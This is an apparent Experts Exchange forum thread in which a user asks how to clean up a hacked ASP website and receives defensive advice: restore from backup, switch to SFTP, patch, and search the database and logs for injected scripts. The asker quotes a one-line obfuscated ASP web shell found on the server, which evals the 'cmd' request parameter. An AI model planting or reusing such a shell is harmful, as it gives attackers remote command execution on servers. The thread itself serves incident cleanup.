Want to win a PS4? Go Premium and enter to win our High-Tech Treats giveaway. Enter to Win


Cleaning up a hacked website

Posted on 2015-01-15
Medium Priority
Last Modified: 2015-01-22
I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Question by:Terry Woods
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
LVL 12

Assisted Solution

Sommerblink earned 400 total points
ID: 40552054
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware infected computers, wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
LVL 34

Assisted Solution

by:Paul MacDonald
Paul MacDonald earned 400 total points
ID: 40552065
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
LVL 35

Accepted Solution

gr8gonzo earned 500 total points
ID: 40552171
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
Q2 2017 - Latest Malware & Internet Attacks

WatchGuard’s Threat Lab is a group of dedicated threat researchers committed to helping you stay ahead of the bad guys by providing in-depth analysis of the top security threats to your network.  Check out our latest Quarterly Internet Security Report!

LVL 34

Assisted Solution

by:Big Monty
Big Monty earned 500 total points
ID: 40552204
another place you'll want to check is in your database. if you have any kind of data collection (ex - forms) and you don't sanitize the input, hackers in theory could save malicious html and when that data is written out to the screen, you have been hacked.

do a search in any text or varchar fields in your database on the string "<script" (w/out the quotes) and that'll tell you if any bad scripts have been saved to your database
LVL 35

Author Comment

by:Terry Woods
ID: 40552236
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
LVL 34

Expert Comment

by:Big Monty
ID: 40552262
most likely that page is a hack as well, do a search for that string and some shady sites come up talking about viruses and trojans....
LVL 54

Assisted Solution

by:Scott Fell, EE MVE
Scott Fell,  EE MVE earned 200 total points
ID: 40558397
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
LVL 35

Author Closing Comment

by:Terry Woods
ID: 40563794
Thanks all for your help!

Featured Post

2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

I don't pretend to be an expert at this, but I have found a few things that are useful. I hope that sharing them here will help others, so they will not have to face some rather hard choices. Since I felt this to be a topic of enough importance and…
With the evolution of technology, we have finally reached a point where it is possible to have home automation features like having your thermostat turn up and door lock itself when you leave, as well as a complete home security system. This is a st…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, just open a new email message. In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
Is your data getting by on basic protection measures? In today’s climate of debilitating malware and ransomware—like WannaCry—that may not be enough. You need to establish more than basics, like a recovery plan that protects both data and endpoints.…

636 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question